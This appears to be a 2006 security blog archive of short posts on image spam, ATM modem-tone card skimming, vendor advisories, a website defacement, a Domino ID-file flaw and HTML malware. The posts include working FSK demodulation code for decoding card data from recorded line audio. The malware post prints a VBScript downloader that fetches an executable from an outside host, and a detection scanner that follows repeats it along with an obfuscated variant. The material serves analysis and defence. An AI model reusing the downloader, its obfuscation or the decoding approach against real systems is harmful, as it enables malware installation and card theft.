November 2006

Revenge of the Captcha! (Reverse Captcha, Ransom Notes and Image Spam)


Thanks for the image to Jeff Chan.

For months now, images have been increasingly seen in spam, reaching up to 30 to 40 per cent of all spam. For a while, counter-measures have been in play, developed by many different folks, some we know, some we don't: from system administrators developing signatures to a team at SpamAssassin working on an OCR system to break these images and check their text for spamishness.

When I first encountered it, a friend of mine was as excited as I was: "Why, it's exactly like a captcha, only in reverse!"

Hence the term I just coined: reverse captcha.

As it's a cat-and-mouse game of escalations and counter-measures by bad guys and good guys, the bad guys learn and make our lives more difficult. I will try to explain what a reverse captcha is to me (and no, it's not a special type of Turing test, although we touch on that below).

Credit card data from cash machine line to…MP3 player!

This Guardian article is quite confusing:

A [Manchester] man who used MP3 players to bug cash machines and steal the personal details of unsuspecting bank customers has been jailed for 32 months.

The report continues: the 41-year-old man and his team attached MP3 players to the backs of _free-standing_ cash machines in bars, bingo halls and the like.

What they recorded was the modem sound familiar from acoustically coupled modems, the one you hear when you dial a fax machine's phone line: the free-standing machines were sending the card data over an ordinary dial-up line.

The team had special software for decoding the tones into readable information. The rest is easy to guess: yes, they cloned several credit cards this way.
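The security-relevant point of the story is that decoding the tones was enough: the card data went over the dial-up link in the clear, so a recording of the line is as good as a tap. As an added illustration (my code, not from the article or the gang's tool; the article does not say which modem standard the machines used, so the baud rate and the two tone frequencies below are assumptions, chosen as whole cycles per bit period to keep the detector simple), here is a binary FSK modulator and a non-coherent demodulator in pure Python that recover a constructed track-2-style string from the "audio", even with noise added to stand in for a poor recording:

```python
import math
import random

# Link parameters for this demo (assumed; the article does not say which
# modem standard the cash machines used). Both tones are whole cycles per
# bit period, so each bit window is orthogonal to the other tone.
SAMPLE_RATE = 9600                      # audio samples per second
BAUD = 300                              # bits per second
SAMPLES_PER_BIT = SAMPLE_RATE // BAUD   # 32 samples per bit
TONE_0 = 1200.0                         # Hz for a 0 bit (4 cycles per bit)
TONE_1 = 2100.0                         # Hz for a 1 bit (7 cycles per bit)


def bytes_to_bits(data: bytes) -> list:
    """MSB-first bit list; no start/stop framing (a simplification)."""
    return [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]


def bits_to_bytes(bits: list) -> bytes:
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        value = 0
        for bit in bits[i:i + 8]:
            value = (value << 1) | bit
        out.append(value)
    return bytes(out)


def modulate(data: bytes, noise_sigma: float = 0.0, seed: int = 1) -> list:
    """Continuous-phase binary FSK of `data`. Optional Gaussian noise stands
    in for the imperfections of an MP3-player recording of the line."""
    rng = random.Random(seed)
    phase = 0.0
    samples = []
    for bit in bytes_to_bits(data):
        step = 2.0 * math.pi * (TONE_1 if bit else TONE_0) / SAMPLE_RATE
        for _ in range(SAMPLES_PER_BIT):
            samples.append(math.sin(phase) + rng.gauss(0.0, noise_sigma))
            phase += step
    return samples


def tone_energy(window: list, freq: float) -> float:
    """Energy of `window` at `freq`: squared magnitude of its correlation
    with a cosine and a sine, so the result does not depend on phase."""
    i_sum = q_sum = 0.0
    for n, sample in enumerate(window):
        angle = 2.0 * math.pi * freq * n / SAMPLE_RATE
        i_sum += sample * math.cos(angle)
        q_sum += sample * math.sin(angle)
    return i_sum * i_sum + q_sum * q_sum


def demodulate(samples: list) -> bytes:
    """Non-coherent FSK detector: for each bit period, pick the louder tone.
    Bit timing is assumed known (recording starts on a bit boundary); a real
    receiver would also need clock recovery and async framing."""
    bits = []
    for start in range(0, len(samples) - SAMPLES_PER_BIT + 1, SAMPLES_PER_BIT):
        window = samples[start:start + SAMPLES_PER_BIT]
        bits.append(1 if tone_energy(window, TONE_1) > tone_energy(window, TONE_0) else 0)
    return bits_to_bytes(bits)


# Constructed track-2-style payload using the well-known Visa test number.
SAMPLE_TRACK = b";4111111111111111=0912101?"

if __name__ == "__main__":
    audio = modulate(SAMPLE_TRACK, noise_sigma=0.5)   # SNR of roughly 6 dB
    print(demodulate(audio))
```

The demodulator needs no key, no handshake and no knowledge of the terminal: anyone with the recording and the line parameters gets the cleartext. That is the property an encrypted (or at least MAC-protected) link would have denied the attackers.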

ZDI: Symantec, Kaspersky, CA, MS have unpatched flaws

The Zero Day Initiative program lists several new vulnerabilities reported within a week. From their Upcoming ZDI Advisories page:

Affected Vendor – Severity – Reported on / Age:

Microsoft – High – 2006.11.08, 7 days ago (2 advisories)
Mozilla – High – 2006.11.08, 7 days ago
Computer Associates – High – 2006.11.08, 7 days ago (3 advisories)
Kaspersky – High – 2006.11.09, 6 days ago
Symantec – High – 2006.11.09, 6 days ago

It appears that many of them are related to AV or firewall software, or am I wrong? CA, Kaspersky, Symantec, etc.

Unspecified Sophos products suffer from unpatched vulnerabilities too, but those are about two months old:

Sophos – High – 2006.09.14, 62 days ago (2 advisories)

And Mozilla and Microsoft products have their own unpatched issues listed as well.

Copy and Paste Security Bugs?? The *BSD case…

So, it's time for another blog entry, another idiot/dumb post…

http://www.securityfocus.com/archive/1/451637/30/0/threaded

And for sure DragonFlyBSD and TrustedBSD* are also affected by this issue… why?

Does the bug occur because BSD developers don't know how integer conversion is done? Or just because you copied and pasted the bug from another BSD into yours? It's always a problem when you copy code from another location. How secure is that code? What historical security problems does it have? Let's audit it!
Congratulations to you, OpenBSD guys, who simply don't support things you don't audit… why would someone want to use FireWire? hehehe. Yeah! It's pretty easy to talk about the problems, but how can I help to solve them? I really dunno… In my mind, you need to understand the code you are copying, but, for God's sake, please, copy it 😉

Cya,

Rodrigo Rubira Branco (BSDaemon).

Site of Polish police defaced

It appears that one Web site of the Polish police, www.elblag.policja.gov.pl, was defaced on Tuesday.

The Zone-H mirror is located here. The home page was the target of the attack, which is why the site is not working right now.

They were running Linux with the following Apache server banner:

Apache-AdvancedExtranetServer/2.0.47 Mandrake Linux/1.6.91mdk mod_perl/1.99_08 Perl/v5.8.0 auth_mysql/1.11 mod_ssl/2.0.47 OpenSSL/0.9.7a PHP/4.3.1

If some of the readers know what the “elblag” means I will be grateful 😉

6 new advisories, none affect Vista

It sounds like a good start: Vista appears not to be affected by any of the 6 new advisories released today by Microsoft. The vulnerability affecting Vista is the XML Core Services vulnerability in IE that has recently been exploited by malicious web sites to execute arbitrary code.

It would be interesting to see whether this trend of Vista staying outside the spotlight of vulnerabilities continues.

[UPDATE] – The XML vulnerability doesn't affect Vista, sorry for the confusion:

Is Windows Vista vulnerable to this issue?
Windows Vista does not include a vulnerable version of Microsoft XML Core Services. Windows Vista includes msxml6.dll version 6.10.1129 and is not vulnerable. However, if an application has been applied that installed a vulnerable version of Microsoft XML Core Services 4.0 this update should be applied

Notes/Domino flaw enables stealing ID files – via NRPC protocol

As users familiar with Notes/Domino systems know, publishing Address Books on a company Web site is not a good idea.

Now let's look at the risks to ID files. It was not widely covered last week when information about an information disclosure vulnerability in Domino systems was published: the Notes Remote Procedure Call (NRPC) protocol on port 1352 allows user ID files to be downloaded remotely. Huh!

Versions 5.0, 6.0, 6.5, and 7.0 are affected. Fixed versions 6.5.5 Fix Pack 2 (FP2) and 7.0.2 have been released. There is no fix for R5, because R5 is no longer supported. The vendor states that Windows, Linux, AIX and Solaris systems are vulnerable.

IBM Technote document #1248026 is available here.

More details in the FortConsult advisory [PDF] by Andrew Christensen.

Old-fashioned organisations possibly still running Notes R5: it's time to upgrade to a fixed R6 or R7 release ASAP.

Malware utilizes AJAX to install itself

One of our customers has brought this HTML-based malware to our attention:

[title][/title]
[head][/head]
[body]
[script language="VBScript"]
on error resume next

' due to how ajax works, the file MUST be within the same local domain
dl = "http://grupo-arroba.by.ru/grupo.exe"

' create adodbstream object
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
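As an added example (my code, not from the page or from the malware author): a small indicator scanner for HTML-embedded VBScript downloaders of this shape. The script above instantiates CLSID BD96C556-65A3-11D0-983A-00C04FC29E36, which is the RDS.DataSpace control; its CreateObject method lets page script obtain Microsoft.XMLHTTP and similar objects regardless of their safe-for-scripting marking, the issue Microsoft addressed in MS06-014 (that attribution is from the CLSID, not something the snippet states). The scanner looks for that CLSID, the `.CreateObject(` call, the XMLHTTP and ADODB.Stream ProgIDs, a `.exe` download URL and the `on error resume next` silencer, and also folds the simplest string-splitting obfuscation before matching. The indicator names, the scoring in `is_downloader` and the sample pages are my own constructions; the malicious sample reproduces the snippet above with straight quotes.

```python
import re

# CLSIDs worth flagging on sight. Only the one used by the snippet above is
# listed; the description is a fact about that CLSID (MS06-014), not from the page.
KNOWN_CLSIDS = {
    "BD96C556-65A3-11D0-983A-00C04FC29E36": "RDS.DataSpace, CreateObject abuse (MS06-014)",
}

# Indicator name -> pattern. Names are my own labels.
INDICATORS = [
    ("createobject_method", re.compile(r"\.CreateObject\s*\(", re.I)),
    ("xmlhttp", re.compile(r"Microsoft\.XMLHTTP|MSXML2\.XMLHTTP", re.I)),
    ("adodb_stream", re.compile(r"ADODB\.Stream", re.I)),
    ("exe_url", re.compile(r"https?://[^\s\"']+\.exe\b", re.I)),
    ("on_error_resume_next", re.compile(r"on\s+error\s+resume\s+next", re.I)),
]
CLSID_RE = re.compile(
    r"clsid:\s*\{?([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})\}?", re.I)


def normalise(source: str) -> str:
    """Straighten curly quotes (common on blog copies) and join strings split
    with & or + so "Micro" & "soft.XMLHTTP" still matches."""
    text = (source.replace("\u201c", '"').replace("\u201d", '"')
                  .replace("\u2018", "'").replace("\u2019", "'"))
    return re.sub(r'"\s*[&+]\s*"', "", text)


def scan(source: str) -> dict:
    """Return {indicator: sorted unique matches} for every indicator present."""
    text = normalise(source)
    hits = {}
    for name, pattern in INDICATORS:
        matches = sorted(set(pattern.findall(text)))
        if matches:
            hits[name] = matches
    known = sorted({f"{c.upper()} ({KNOWN_CLSIDS[c.upper()]})"
                    for c in CLSID_RE.findall(text) if c.upper() in KNOWN_CLSIDS})
    if known:
        hits["known_clsid"] = known
    return hits


def is_downloader(hits: dict) -> bool:
    """Heuristic verdict (my own): a flagged CLSID, an HTTP client obtained
    through it, and an executable to fetch."""
    return ("known_clsid" in hits
            and ("xmlhttp" in hits or "createobject_method" in hits)
            and "exe_url" in hits)


# Constructed samples. MALICIOUS_SAMPLE is the page's snippet with straight quotes.
MALICIOUS_SAMPLE = """<script language="VBScript">
on error resume next
' due to how ajax works, the file MUST be within the same local domain
dl = "http://grupo-arroba.by.ru/grupo.exe"
' create adodbstream object
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
</script>"""

OBFUSCATED_SAMPLE = """<script language="VBScript">
dl = "http://grupo-arroba.by.ru/" & "grupo.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-" & "11D0-983A-00C04FC29E36"
Set x = df.CreateObject("Micro" + "soft.XMLHTTP", "")
</script>"""

BENIGN_SAMPLE = """<script>
var r = new XMLHttpRequest(); r.open("GET", "/api/status"); r.send();
</script>"""

if __name__ == "__main__":
    for label, page in (("malicious", MALICIOUS_SAMPLE),
                        ("obfuscated", OBFUSCATED_SAMPLE),
                        ("benign", BENIGN_SAMPLE)):
        hits = scan(page)
        print(label, is_downloader(hits), hits)
```

Run this over mail attachments or proxy-captured HTML as a triage pass; it is a string matcher, so anything beyond the trivial concatenation trick (Chr() building, Execute of a decoded blob) will slip past it, and a positive verdict should send the sample to a sandbox rather than stand on its own.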